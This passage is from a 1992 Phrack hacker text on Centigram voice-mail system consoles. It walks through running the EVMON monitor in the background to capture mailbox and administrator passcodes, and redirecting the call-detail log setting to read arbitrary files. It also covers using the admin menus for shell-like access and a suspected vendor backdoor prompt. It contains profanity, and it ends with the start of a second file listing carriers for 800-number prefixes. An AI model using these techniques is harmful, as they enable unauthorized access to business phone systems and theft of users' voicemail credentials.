8762 is 2030 (the * key, along with the 0 key, can acts as the "user entering
mailbox" key; it can, however, also be the abort key during passcode entry, and
other things as well). Now the user, of course, doesn't usually dial 8762 to
enter his mailbox; he simply dials the mailbox number and then * plus his
passcode; the reason for this is the type of signalling coming from the switch
to this particular business line was set-up for four digit touch tone ID to
route the line to the appropriate called number. This is not the only method
of signalling, however, as I've seen other businesses that use three digit
pulse signalling, for example, and there are others as well. Each may have
it's own eccentricities, but I would imagine that the line ID would be
displayed with EVMON in most cases.

Now, let's say we're on-line, and we want to play around, and we want to
collect passcodes. We've set up our ramdisk to normal size and we are ready to
run evmon. We could run it, sit at our terminal, and then record the output,
but it's such a time consuming task (this is "real-time," after all) that
sitting and waiting be nearly pointless. So, we use the handy features of
run-in-background and file-redirection (see, I told you we were getting
"Unix-like").

$ evmon > 3:/tmp/output &


Type Ctrl-C to terminate.
5e1e
$ ...

5e1e is the task ID (TID) of the new evmon process. Now we can go off and
perform whatever lists we want, or just play in the directories, or route
DobbsHeads or whatever. When we decide to end for the day, we simply stop
EVMON, nab the file, remove it, and if necessary, dismount the ramdisk.

$ kill 5e1e
$ p 3:/tmp/output
[ EVMON output would normally appear; if, however, ]
[ there is none, the file would be deleted during ]
[ the kill with an error message resulting ]
$ rm 3:/tmp/output
$ rmdir 3:/tmp
$ mount ramdisk 3

and now we can ^D or exit out of the shell and say good-bye.

The good thing about this EVMON procedure is that you don't need to be
on-line while it runs. You could start a task sometime at night and then wait
until the next day before you kill the process and check your results. This
usually produces large log files anywhere from 40K to 200K, depending upon the
amount of system usage (these figures are rough estimates). If, however, you
start the EVMON task and leave it running, then the administrator will not be
able to start a new EVMON session until the old task is killed. While this
probably shouldn't be a problem over the weekends, during business hours it may
become a little risky.

Remember though, that the risk might be worth it, especially if the
administrator decides to check his mailbox; you'd then have his passcode, and,
possibly, remote telephone access to system administrator functions via touch-
tone on the mailbox system.

Task management:

As we have just noted, any task like EVMON can be run in the background by
appending the command line with a &, the standard Unix "run-in-background"
character. A Task ID will echo back in hexadecimal, quite comparable to the
Unix Process ID. The program responsible for task management is called "tsk"
and should be in 1:/cmds/tsk. Output from running tsk alone should look
something like:

$ tsk
Tty Program Tid State Blk Pri Flags Grp Mem Dad Bro Son
0 task 0001 READY ---- 1 ---IPLA----- 255 255 ---- ---- ----
0 fsys 0002 RECV 0000 3 ---IPLA----- 255 255 ---- ---- ----
0 dev 0003 RECV 0000 2 ---IPLA----- 255 255 ---- ---- ----
0 idle 0004 READY ---- 15 ----PLA----- 255 255 ---- ---- 0508
0 /cmds/timer 0607 RECV 0000 2 -S--P-AC---- 255 255 ---- ---- ----
0 /cmds/err_log 0509 RECV 0000 5 -S--P--C---- 255 255 0A0A ---- ----
0 /cmds/ovrseer 0A0A REPLY 0607 5 -S--P--C---- 255 255 ---- ---- 030C
0 /cmds/recorder 010B REPLY 0509 5 -S--P--C---- 255 255 0A0A 0509 ----
0 /cmds/master 030C REPLY 0607 5 -S--P--C---- 255 255 0A0A 010B 011C
[ ... a wide assortment of programs ... ]
0 /cmds/vmemo 011C REPLY 0110 13 -S-----C---- 255 255 030C 011B ----
3 /cmds/comm 0508 RECV 5622 8 ----P-A----- 255 255 0004 ---- 5622
3 /cmds/tsk 051D REPLY 0001 8 ------------ 255 255 301E ---- ----
3 /cmds/qnxsh 301E REPLY 0001 14 ---------E-- 255 255 5622 ---- 051D
3 /cmds/login 5622 REPLY 0003 8 -------C---- 255 255 0508 ---- 301E

Although I'm not quite sure at some of the specifics displayed in this
output, the important parts are obvious. The first column is the TTY number
which corresponds to the $tty list in "mount" (meaning that the modem I've just
called is $tty3, and I am simultaneously running four tasks from that line);
the second column is the program name (without the drive specification); the
third column is the task ID; the middle columns are unknown to me; and the last
three represent the ties and relations to other tasks (parent task ID, another
task ID created from the same parent, and task ID of any program called).

Knowing this, it's easy to follow the tasks we've created since login.
Initially, task 0508, /cmds/comm, was run, which presumably contains the
requisite "what should I do now that my user has pressed a key?" functions,
which called /cmds/login to log the user in. Login was interrupted with ^Z and
one of the shells, qnxsh, was called to handle input from the user. Finally,
the typing of "tsk" requires that the /cmds/tsk program be given a task ID, and
the output of the program is simply confirming that it exists.

As mentioned, to kill a task from the shell, simply type "kill [task-id]"
where [task-id] is the four digit hexadecimal number.

There are other functions of the tsk program as well. The help screen
lists:

$ tsk ?
use: tsk [f={cmoprst}] [p=program] [t=tty] [u=userid]
tsk code [p=program]
tsk info
tsk mem t=tid
tsk names
tsk size [p=program] [t=tty] [u=userid]
tsk ports
tsk tsk
tsk tree [+tid] [+all] [-net]
tsk users [p=program] [t=tty] [u=userid]
tsk vcs
tsk who tid ...
options: +qnx -header +physical [n=]node s=sort_field

I haven't seen all the information available from this, yet, as the plain
"tsk" tells me everything I need to know; however, you may want to play around:
there's no telling what secrets are hidden...

$ tsk tsk
Tsk tsk? Have I been a bad computer?

See what I mean?

ddump:

The ddump utility is used to display the contents on a specified blocks of


the disk. It's quite simple to use.

$ ddump ?
use: ddump drive block_number [-v]

Again, I'm not quite sure what the -v switch does, but the instructions
are very straightforward. Normal output looks similar to:

$ ddump 3 3
Place diskette in drive 3 and hit <CR> <-- this message is always
displayed by ddump.
Block 00000003 Status: 00
000: 00 00 00 00 00 00 00 00 94 00 00 00 00 00 00 00 ................
010: 01 00 01 00 40 02 00 00 00 02 00 00 00 00 00 00 ....@...........
020: 00 01 00 FF FF 00 00 97 37 29 17 00 01 01 01 30 ........7).....0
030: C4 17 8E 62 69 74 6D 61 70 00 00 00 00 00 00 00 ...bitmap.......
040: 00 00 00 00 C0 00 00 00 00 00 00 00 00 00 00 00 ................
050: 00 00 00 FF FF 00 00 A5 37 29 17 00 01 01 17 30 ........7).....0
060: C4 25 8E 6C 6C 6C 00 00 00 00 00 00 00 00 00 00 .%.lll..........
070: 00 00 00 00 50 0E 00 00 00 0E 00 00 00 00 00 00 ....P...........
080: 00 01 00 FF FF 7E 05 A8 38 29 17 00 01 01 17 30 .....~..8).....0
090: C4 28 8F 61 62 63 00 00 00 00 00 00 00 00 00 00 .(.abc..........
0A0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0B0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
[...etc...]

As you can probably notice, what we have here is the directory track for
the ramdisk. It lists three files, even though the file abc no longer exists.
The actual bytes have yet to be decoded, but, as far as the ramdisk goes, I
suspect that they'll be memory related, and not physical block related; that
is, I suspect that some of the numbers given above correspond to the memory
address of the file, and not to the actual disk-block. So, at least for the
ramdisk, finding specific files may be difficult. However, if you only have
one file on the ramdisk besides "bitmap" (which appears to be mandatory across
all the disks), then the next file you create should reside on track 4 and
continue working its way up. Therefore, if you have evmon running and
redirected to a file on the ramdisk, in order to check the contents, it's not
necessary to kill the process and restart evmon, etc. Simply "ddump 3 4" and
you could get either useless information (all the bytes are 00 or FF), or you
could get something like:

$ ddump 3 4
Place diskette in drive 3 and hit <CR>

Block 00000004 Status: 00


000: 00 00 00 00 00 00 00 00 00 00 00 00 09 00 00 00 ................
010: 6C 6E 20 20 32 36 20 74 74 20 33 1E 6C 6E 20 20 ln 26 tt 3.ln
020: 32 36 20 6C 69 6E 65 20 62 72 65 61 6B 1E 6C 6E 26 line break.ln
030: 20 20 32 36 20 6F 6E 68 6F 6F 6B 1E 6C 6E 20 20 26 onhook.ln
040: 32 38 20 72 69 6E 67 69 6E 67 1E 6C 6E 20 20 32 28 ringing.ln 2
050: 38 20 74 74 20 38 1E 6C 6E 20 20 32 38 20 74 74 8 tt 8.ln 28 tt
060: 20 37 1E 6C 6E 20 20 32 38 20 74 74 20 36 1E 6C 7.ln 28 tt 6.l
070: 6E 20 20 32 38 20 74 74 20 32 1E 6C 6E 20 20 32 n 28 tt 2.ln 2
080: 38 20 6F 66 66 68 6F 6F 6B 1E 6C 6E 20 20 32 38 8 offhook.ln 28
090: 20 74 74 20 2A 1E 6C 6E 20 20 32 38 20 74 74 20 tt *.ln 28 tt

And so forth, thus making sure that the file does have some content.
Depending upon the length of that content, you could then choose to either keep
the file running, or restart evmon and buffer the previous output.

led:

The program "led" is Centigram's answer to a standard text editor. It is


equivalent to "ed" in Unix or "edlin" in MS-DOS, but it does have its minor
differences. "led" is used to create text files, edit existing log files, or
edit executable shell scripts. By typing "led [filename]", you will enter the
led editor, and if a filename is specified, and it exists, the file will be
loaded and the editor set to line 1. If there is no filename on the command
line, the file does not exist, or the file is busy, then led begins editing a
null file, an empty buffer, without the corresponding filename.

Commands can also be specified to be used in led after the filename is


entered. If needed, you can experiment with this.

Notable commands from within led:

i insert
a append
w [filename] write to disk; if no file is named, attempt to
write to current file; if there is no current
file, do not write.
d delete current line
a number goto line numbered
q quit (if not saved, inform user to use "qq")
qq really quit

When inserting or appending, led will prompt you with a "." period. To
end your entry, simply enter one period alone on a line and you will then
return to command mode. When displaying the current entry, led will prefix all
new, updated lines, with the "i" character.

The key sequence to enter a DobbsHead into a file and redirect it to the
console, then, would be:

$ led 3:/dobbshead
3:/dobbshead : unable to match file
i
. ___
. . / \
. . | o o |
. . | Y |
. U===== |
. \___/
. FUCK YOU!
q
?4 buffer has been modified, use qq to quit without saving
w 3:/dobbshead
7 [the number of lines in the file]
q
$ p 3:/dobbshead > $cons
$ rm 3:/dobbshead

Ok, so it's not quite the DobbsHead. Fuck you.

The console utility:

The program that acts as the menu driver for the Voice Mail System
Administration, the program that is normally run upon correct passcode entry,
is /cmds/console. This program will simply produce a menu with a variety of
sub-menus that allow the administrator to perform a wide assortment of tasks.
Since this is mostly self-explanatory, I'll let you find out about these
functions for yourself; I will, however, add just a few comments about the
console utility. The first menu received should look like this:

(c) All Software Copyright 1983, 1989 Centigram Corporation


All Rights Reserved.

MAIN MENU

(M) Mailbox maintenance


(R) Report generation
(S) System maintenance
(X) Exit

Enter letter in () to execute command.


When you need help later, type ?.

COMMAND (M/R/S/X):

The mailbox maintenance option is used when you want to find specific
information concerning mailboxes on the system. For instance, to get a listing
of all the mailboxes currently being used on the system:

COMMAND (M/R/S/X): m

MAILBOX MAINTENANCE

(B) Mailbox block inquiry


(C) Create new mailboxes
(D) Delete mailboxes
(E) Mailbox dump
(I) Inquire about mailboxes
(L) List maintenance
(M) Modify mailboxes
(P) Set passcode/tutorial
(R) Rotational mailboxes
(S) Search for mailboxes
(X) Exit

If you need help later, type ?.

COMMAND (B/C/D/E/I/L/M/P/R/S/X): i
Report destination (c/s1/s2) [c]:

Mailbox to display: 0000-9999

>>> BOBTEL <<<


Mailbox Data Inquiry
Tue Mar 31, 1992 3:07 am

Box Msgs Unp Urg Rec Mins FCOS LCOS GCOS NCOS MWI Passwd
8001 1 1 0 0 0.0 5 5 1 1 None Y
8002 0 0 0 0 0.0 5 5 1 1 None Y (t)
8003 0 0 0 0 0.0 12 12 1 1 None Y
8005 0 0 0 0 0.0 12 12 1 1 None Y
8006 6 6 0 0 0.7 12 12 1 1 None N
8008 0 0 0 0 0.0 5 5 1 1 None Y
8013 0 0 0 0 0.0 12 12 1 1 None 1234
8014 0 0 0 0 0.0 5 5 1 1 None Y
8016 0 0 0 0 0.0 12 12 1 1 None Y
[ ... etc ... ]

This simply lists every box along with the relevant information concerning
that box. Msgs, Unp, Urg, Rec are the Total number of messages, number of
unplayed messages, number of urgent messages, and number of received messages
currently being stored on the drive for the mailbox; Mins is the numbers of
minutes currently being used by those messages; F, L, G, and NCOS are various
classes of service for the mailboxes; MWI is the message waiting indicator, or
service light; and Passwd is simply a Yes/No condition informing the
administrator whether the mailbox currently has a password. The "(t)" in the
password field means the box is currently in tutorial mode, and the "1234" that
replaces the Y/N condition, which means the box is set to initial tutorial mode
with simple passcode 1234 -- in other words the box is available to be used by
a new subscriber. Mailboxes with FCOS of 1 should be looked for: these
represent administration or service mailboxes, although they are not
necessarily capable of performing system administration functions.

The System Maintenance option from the main menu is very useful in that,
if you don't have access to the qnxsh, you can still run a number of tasks or
print out any file you wish from within the menu system. The System
Maintenance menu looks like:

SYSTEM MAINTENANCE

(A) Automatic Wakeup


(B) Automated Receptionist Extensions
(D) Display modem passcode
(E) Enable modem/serial port
(F) Floppy backup
(G) Resynchronize HIS PMS room status
(H) Hard Disk Utilities
(L) Lights test
(M) Manual message purge
(N) System name
(P) Passcode
(R) Reconfiguration
(S) System shutdown
(T) Time and date
(U) Utility menu
(V) Call Detail Recorder
(W) Network menu
(X) Exit

Enter letter in () to execute command.


When you need help later, type ?.
COMMAND (A/B/D/E/F/G/H/L/M/N/P/R/S/T/U/V/W/X):

If you don't have access to the "p" command, you can still display any
specific file on the drive that you wish to see. Choose "v," the Call Detail
Recorder option from above, and you will get this menu:

COMMAND (A/B/D/E/F/G/H/L/M/N/P/R/S/T/U/V/W/X): v
Warning: cdr is not running.

CALL DETAIL RECORDER MENU

(C) Configure CDR


(R) Run CDR
(T) Terminate CDR
(E) Run EVMON
(F) Terminate EVMON
(S) Show CDR log file
(D) Delete CDR log file
(X) Exit

If you need help later, type ?.

COMMAND (C/R/T/E/F/S/D/X):

From here, you can use (C) Configure CDR to set the log file to any name
that you want, and use (S) to print that file to your terminal.

COMMAND (C/R/T/E/F/S/D/X): c

Answer the following question to configure call detail recorder


[ simply hit return until the last "filename" question come up ]
VoiceMemo line numbers enabled:
HOST 1 lines:
0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31
VoiceMemo line numbers:

EVMON: HOST 1 lines to monitor:


0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31
EVMON:VoiceMemo line numbers:
Message levels are:
1: Detailed VoiceMemo
2: VoiceMemo
3: Pager
4: Receptionist
5: EVMON
6: Automatic WakeUp
7: Open Account Administrator
8: DTMF to PBX
9: Message Waiting Lamp
10: SL-1 integration
11: Centrex Integration
Message levels enabled:
2 3 7 9
Message levels:
cdr enable = [N]
Enter filename to save log data = [/logfile] /config/remote.cmds

Returning from the CDR configuration.

CALL DETAIL RECORDER MENU

(C) Configure CDR


(R) Run CDR
(T) Terminate CDR
(E) Run EVMON
(F) Terminate EVMON
(S) Show CDR log file
(D) Delete CDR log file
(X) Exit

If you need help later, type ?.

COMMAND (C/R/T/E/F/S/D/X): s
ad
cd
copy
date
dskchk
evmon
files
ls
mount
p
pwd
query
task
tcap
what

Don't forget to return the filename back to its original name as shown in
the [] field after you have finished.

If you don't have access to the shell, you can also run EVMON, from the
CDR menu, using option E. It will simply start the evmon process displaying to
your terminal, interruptable by the break character, ^C. This, unfortunately,
cannot be redirected or run in the background as tasks running from the shell
can. If, however, you have some time to kill, you may want to play with it.

Also, from the System Maintenance menu, you can perform a number of shell
tasks without direct access to the shell. Option (U), Utilities Menu, has an
option called Task. This will allow you limited shell access, possibly with
redirection and "&" back-grounding.

COMMAND (A/B/D/E/F/G/H/L/M/N/P/R/S/T/U/V/W/X): U

UTILITY MENU

(B) Reboot
(H) History
(T) Task
(X) Exit

Enter letter in () to execute command.


When you need help later, type ?.

COMMAND (B/H/T/X): t

Choose the following commands:


ad cd copy date
dskchk evmon files ls
mount p pwd query
task tcap what

Enter a command name or "X" to exit: pwd


1:/

Choose the following commands:


ad cd copy date
dskchk evmon files ls
mount p pwd query
task tcap what

Enter a command name or "X" to exit: evmon


Type Ctrl-C to terminate.
ln 29 ringing
ln 29 tt 8
ln 29 tt 0
ln 29 tt 8
ln 29 tt 6
ln 29 offhook
ln 29 record ended
[ ... etc ... ]

A look at "ad":

The program "ad" is called to dump information on a variety of things, the


most useful being mailboxes. Dumps of specific information about a mailbox can
be done either in Mailbox format, or Raw Dump format. Mailbox format looks
like:

$ ad
Type #: 0
Mailbox #: 8486
(M)ailbox, (D)ump ? m

MAILBOX: 8486

Login status:
Bad logs = 3 Last log = 03/26/92 12:19 pmVersion = 0

Configuration:
Name # = 207314 Greeting = 207309 Greeting2 = 0
Passcode = XXXXXXXXXX Tutorial = N Extension = 8486
Ext index = 0 Attendant = Attend index = 0
Code = ID = BOBTECH
Day_treat = M Night_treat = M Fcos = 12
Lcos = 12 Gcos = 1 Ncos = 1
Rot index = 0 Rot period = 0
Rot start = --
wkup defined = N wkup freq = 0 wkup_intvl = 0
wkup index = 0 wkup number =
Contents:
Motd_seq = 8 Motd_played = N User_msgs = 0
Caller_msgs = 4 Sent_cpx_msgs= 0 Sent_fdx_msgs= 0
Sent_urg_msgs= 0 Tas_msgs = 0 Pages = 0
Receipt = 0 Sent_to_node = 0 Urg_to_node = 0
Net_urg_mlen = 0 Net_msgs_rcv = 0 Net_urg_rcv = 0
Net_sent_node= 0 Net_send_nurg= 0 Net_send_rcp = 0
Greet_count = 9 Successlogins= 1 Recpt_calls = 0
Recpt_complt = 0 Recpt_busy = 0 Recpt_rna = 0
Recpt_msgs = 0 Recpt_attend = 0 User_connect = 20
Clr_connect = 22 Callp_connect= 0 Disk_use = 498
Net_sent_mlen= 0 Net_rcvd_mlen= 0 Net_rcvd_urg = 0
Net_node_mlen= 0 Net_recip_mlen=0 Net_node_urg = 0
Text_msg_cnt = 0

Message Queues:
TYPE COUNT TOTAL HEAD TAIL TYPE COUNT TOTAL HEAD TAIL
Free 71 --- 58 55 Unplayed 0 --- -1 -1
Played 2 0.5 56 57 Urgent 0 --- -1 -1
Receipts 0 --- -1 -1 Undelivered 0 --- -1 -1
Future delivery 0 --- -1 -1 Call placement 0 --- -1 -1

Messages: 2
# msg # DATE TIME LENGTH SENDER PORT FLAGS MSG SIBL
(MINS) NXT PRV NXT PRV
Played Queue
56 207126 03/26/92 12:17 pm 0.5 000000000000000 27 ------P- 57 -1 -1 -1

57 207147 03/26/92 12:19 pm 0.1 000000000000000 29 ------P- -1 56 -1 -1

The Raw Dump format looks like:


$ ad
Type #: 0
Mailbox #: 8487
(M)ailbox, (D)ump ? d

HEX: 8487
000: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 |................|
010: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 |................|
020: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 34 38 |..............48|
030: 37 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 |7...............|
040: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 |................|
050: 00 00 00 00 00 00 00 00 - 00 00 42 49 4f 54 45 43 |..........BOBTEC|
060: 48 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 |H...............|
070: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 |................|
080: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 37 32 33 |.............723|
090: 36 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 |6...............|
0a0: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 |................|
0b0: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 |................|
0c0: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 |................|
[mostly deleted -- the list continues to hex fff.]

One of the unfortunate aspects is that the password is not displayed in


the Mailbox format (Awwww!). I can tell you now, though, that it also isn't
displayed anywhere in the Raw Dump format. The program "asetpass" was used to
change the password of a test mailbox, and both full dumps were downloaded and
compared; they matched exactly. So, it looks like the passcodes are probably
stored somewhere else, and the dump simply contains a link to the appropriate
offset; which means the only way, so far, to get passcodes for mailboxes is to
capture them in EVMON.

Intricacies of the login program:

The console login program is 1:/cmds/login. Although I can't even


recognize any valid 8080 series assembly in the program (and I'm told the
Centigram boxes run on the 8080 family), I did manage to find a few interesting
tidbits inside of it. First, the console and remote passwords seems to be
stored in the file /config/rates; unfortunately, it's encrypted and I'm not
going to try to break the scheme. /config/rates looks like this:

$ p /config/rates
\CE\FFC~C~\0A\00\00\00\00\00\0A\00\00\00\00\00\0A\00\00\00\00\00\0A\00\00\00\00
\00\0A\00\00\00\00\00\0A\00\00\00\00\00\0A\00\00\00\00\00\00\00\00\00\00\00\00
\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00

Accepting the \CE as some sort of control byte, this file is divided up
into about eight empty sections of five bytes a piece, mostly null, indicating
that, possibly, there are a number of acceptable passcode combinations, or a
number of different functions with different passcodes. In this instance, only
one passcode appears to be selected. I am still unsure, however, whether this
is actually a password file, or a file that would act as a pointer to another
space on the disk which contains the actual password. I would assume, for this
login program, that it is actually an encrypted password.

Another very interesting thing sleeping within the confines of the login
program is the inconspicuous string "QNX." It sits in the code between two
"Enter Passcode:" prompts, separated by \00s. I believe this to be a system
wide backdoor placed into the login program by Centigram, Corp. Such a thing
does exist; whenever Centigram wants to get into a certain mailbox system to
perform maintenance or solve a problem, they can. They may, however, require
the serial number of the machine or of the hard drive, in order to get this
access. This serial number would be provided by the company requiring service.

When logging in with QNX, a very strange thing happens.

(^Z)
Enter Passcode: (QNX^M) Enter Passcode:

A second passcode prompt appears, a prompt in which the "QNX" passcode


produces an Invalid Passcode message. I believe that when Centigram logs in
from remote, they use this procedure, along with either a predetermined
passcode, or a passcode determined based on a serial number, to access the
system. I have not ever seen this procedure actually done, but it is the best
speculation that I can give.

I should also make note of a somewhat less important point. Should the
console have no passcodes assigned, a simple ^Z for terminal activation will
start the /cmds/console program, and log the user directly in without prompting
for a passcode. The odds on finding a Centigram like this, nowadays, is
probably as remote as being struck by lightning, but personally, I can recall a
time a number of years back when a Florida company hadn't yet passcode
protected a Centigram. It was very fun to have such a large number of people
communicating back and forth in normal voice; it was even more fun to hop on
conferences with a number of people and record the stupidity of the average
Bell operator.

Special Keys or Strings:

There are a number of special characters or strings that are important to


either the shell or the program being executed. Some of these are:

? after the program name, gives help list for that program.
& runs a task in the background
: sets the comment field (for text within shell scripts)
; command delimiter within the shell
> redirects output of a task to a file
< (theoretically) routes input from a file
$cons the "filename" of the console (redirectable)
$tty# the "filename" of tty number "#"
$mdm the "filename" of the modem line
#$ ? produces a value like "1920", "321d"
probably the TID of the current process
## ? produces a value like "ffff"
#% ? produces a value like "0020", "001d"
#& ? produces a value like "0000"
#? ? produces a value like "0000"
#* a null argument
#g ? produces a value like "00ff"
#i directly followed by a number, produces "0000"
not followed, produces the error "non-existent integer variable" probably
used in conjunction with environment variables
#k accepts a line from current input (stdin) to be
substituted on the command line
#m ? "00ff"
#n ? "0000"
#p ? "0042"
#s produces the error "non-existent string variable" probably used in
conjunction with environment variables
#t ? "0003"
#u ? some string similar to "system"
#D ? "0018"
#M ? "0004"
#Y ? "005c"

"Centigram Voice Mail System Consoles" was written anonymously. There are no
group affiliations tied to this file.
_______________________________________________________________________________

==Phrack Inc.==

Volume Four, Issue Thirty-Nine, File 7 of 13

/^\ /^\ /^\ /^\ /^\ /^\ /^\ /^\ /^\ /^\ /^\ /^\
/^\ /^\
/^\ Special Area Codes II /^\
/^\ /^\
/^\ by Bill Huttig /^\
/^\ wah@ZACH.FIT.EDU /^\
/^\ /^\
/^\ February 24, 1992 /^\
/^\ /^\
/^\ /^\ /^\ /^\ /^\ /^\ /^\ /^\ /^\ /^\ /^\ /^\

The first "Special Area Codes" file appeared in Phrack Issue 24, but here
is an updated listing of the prefixes used with 800 toll free service. This
list shows which carrier handles calls placed to 800-XXX numbers. Choice of
carrier routing on calls to 800-xxx numbers cannot be overridden with 10xxx
routing. It should also be noted that on calls to 800 numbers, the called
party either immediatly in some instances or on a delayed basis receives a
record of numbers which called. This identification of the calling party
cannot be overridden with *67 or the "line-blocking" associated with Caller-ID.

202 RCCP RADIO COMMON CARRIER PAGING


212 RCCP RADIO COMMON CARRIER PAGING
213 9348 CINCINNATI BELL TELEPHONE
220 ATZ ATX-COMMUNICATIONS
221 ATX AT&T-C
222 ATX AT&T-C
223 ATX AT&T-C
224 LDL LONG DISTANCE FOR LESS
225 ATX AT&T-C
226 ATL ATC
227 ATX AT&T-C
228 ATX AT&T-C
229 TDX CABLE & WIRELESS COMMUNICATIONS
230 NTK NETWORK TELEMANAGEMENT SERVICES
231 ATX AT&T-C
232 ATX AT&T-C
233 ATX AT&T-C
234 MCI MCI TELECOMMUNICATIONS CORPORATION
235 ATX AT&T-C
236 SCH SCHNEIDER COMMUNICATIONS
237 ATX AT&T-C
238 ATX AT&T-C
239 DLT DELTA COMMUNICATIONS, INC.
240 SIR SOUTHERN INTEREXCHANGE SERVICES
241 ATX AT&T-C
242 ATX AT&T-C
243 ATX AT&T-C
244 NASC 800 NUMBER SERVICE & ASSIGNMENT CENTER
245 ATX AT&T-C
246 9553 SOUTHWESTERN BELL
247 ATX AT&T-C
248 ATX AT&T-C
249 LWC LASSMAN-WEBER COMMUNICATIONS
251 ATX AT&T-C
252 ATX AT&T-C
253 ATX AT&T-C
254 TTU TOTAL-TEL USA
255 ATX AT&T-C
256 LSI LONG DISTANCE SAVERS
257 ATX AT&T-C
258 ATX AT&T-C
259 LSI LONG DISTANCE SAVERS
260 COK COM-LINK21
261 SCH SCHNEIDER COMMUNICATIONS
262 ATX AT&T-C
263 CAN TELCOM CANADA
264 LDD LDDS COMMUNICATIONS
265 CAN TELCOM CANADA
266 CSY COM SYSTEMS
267 CAN TELCOM CANADA
268 CAN TELCOM CANADA
269 FDG FIRST DIGITAL NETWORK
270 CRZ CLEARTEL COMMUNICATIONS
271 TRA3 TRAFFIC ROUTING ADMINISTRATION 3
272 ATX AT&T-C
273 NASC 800 NUMBER SERVICE & ASSIGNMENT CENTER
274 MCI MCI TELECOMMUNICATIONS CORPORATION
275 ITT MTD/UNITED STATES TRANSMISSION SYSTEMS
276 ONE ONE CALL COMMUNICATIONS, INC.
277 SNT MCI / TDD / SOUTHERNNET, INC.
279 MAL MIDAMERICAN
280 ADG ADVANTAGE NETWORK, INC.
282 ATX AT&T-C
283 MCI MCI TELECOMMUNICATIONS CORPORATION
284 MCI MCI TELECOMMUNICATIONS CORPORATION
286 9147 SOUTHERN NEW ENGLAND TELEPHONE
287 NASC 800 NUMBER SERVICE & ASSIGNMENT CENTER
288 MCI MCI TELECOMMUNICATIONS CORPORATION
289 MCI MCI TELECOMMUNICATIONS CORPORATION
292 ATX AT&T-C
293 PRO PROTO-COL
294 FDC AFFORD A CALL
295 ACT ACC LONG DISTANCE CORPORATION
296 LDW LONG DISTANCE SERVICE, INC.
297 ARE AMERICAN EXPRESS TRS
298 CNO COMTEL OF NEW ORLEANS
299 ATL ATC
302 RCCP RADIO COMMON CARRIER PAGING
312 RCCP RADIO COMMON CARRIER PAGING
320 CQD CONQUEST LONG DISTANCE CORPORATION
321 ATX AT&T-C
322 ATX AT&T-C
323 ATX AT&T-C
324 HNI HOUSTON NETWORKM INC./VXVY TELECOM, INC.
325 ATX AT&T-C
326 UTC US TELCOM, INC./US SPRINT
327 ATX AT&T-C
328 ATX AT&T-C
329 ATL ATC
330 ATL ATC
331 ATX AT&T-C
332 ATX AT&T-C
333 MCI MCI TELECOMMUNICATIONS CORPORATION
334 ATX AT&T-C
335 SCH SCHNEIDER COMMUNICATIONS
336 ATX AT&T-C
337 FDR FIRST DATA RESOURCES
338 ATX AT&T-C
339 NASC 800 NUMBER SERVICE & ASSIGNMENT CENTER
340 FFM FIRST FINANCIAL MANAGEMENT CORPORATION
341 ATX AT&T-C
342 ATX AT&T-C
343 ATX AT&T-C
344 ATX AT&T-C
345 ATX AT&T-C
346 ATX AT&T-C
347 UTC US TELCOM, INC./US SPRINT
348 ATX AT&T-C
349 DCT DIRECT COMMUNICATIONS, INC.
350 CSY COM SYSTEMS
351 ATX AT&T-C
352 ATX AT&T-C
353 SCH SCHNEIDER COMMUNICATIONS
354 ATX AT&T-C
355 ATZ ATX-COMMUNICATIONS
356 ATX AT&T-C
357 CNZ CAM-NET SYSTEMS-INC.
358 ATX AT&T-C
359 UTC US TELCOM, INC./US SPRINT
360 CWV ?
361 CAN TELCOM CANADA
362 ATX AT&T-C
363 CAN TELCOM CANADA
364 HNI HOUSTON NETWORKM INC./VXVY TELECOM, INC.
365 MCI MCI TELECOMMUNICATIONS CORPORATION
366 UTC US TELCOM, INC./US SPRINT
367 ATX AT&T-C
368 ATX AT&T-C
369 TDD MCI / TELECONNECT
370 TDD MCI / TELECONNECT
372 ATX AT&T-C
373 TDD MCI / TELECONNECT
374 ITG INTERNATIONAL TELECHARGE, INC.
375 TNO ATC CIGNAL COMMUNICATIONS
375 ATL ATC
376 ECR ECONO-CALL LONG DISTANCE
377 GTS TELENET COMMUNICATIONS CORPORATION
378 NTP NATIONAL TELEPHONE COMPANY
379 EMI EASTERN MICROWAVE
381 LMI LONG DISTANCE OF MICHIGAN
382 ATX AT&T-C
383 TDD MCI / TELECONNECT
384 FDT FRIEND TECHNOLOGIES
385 CAB HEDGES COMMUNICATIONS /COM CABLE LAYING
386 TBQ TELECABLE CORPORATION
387 CAN TELCOM CANADA
388 MCI MCI TELECOMMUNICATIONS CORPORATION
390 EBR ECONO-CALL
392 ATX AT&T-C
393 EXF PIONEER TELEPHONE /EXECULINES OF FLORIDA
394 TDX CABLE & WIRELESS COMMUNICATIONS
395 MCI MCI TELECOMMUNICATIONS CORPORATION
396 BOA BANK OF AMERICA
397 TDD MCI / TELECONNECT
399 ARZ AMERICALL CORPORATION (CA)
402 RCCP RADIO COMMON CARRIER PAGING
412 RCCP RADIO COMMON CARRIER PAGING
420 TGR TMC OF SOUTHWEST FLORIDA
421 ATX AT&T-C
422 ATX AT&T-C
423 ATX AT&T-C
424 ATX AT&T-C
425 TTH TELE TECH, INC.
426 ATX AT&T-C
427 NASC 800 NUMBER SERVICE & ASSIGNMENT CENTER
428 ATX AT&T-C
429 TRF T-TEL
431 ATX AT&T-C
432 ATX AT&T-C
433 ATX AT&T-C
434 AGN AMERIGON
435 ATX AT&T-C
436 IDN INDIANA SWITCH, INC.
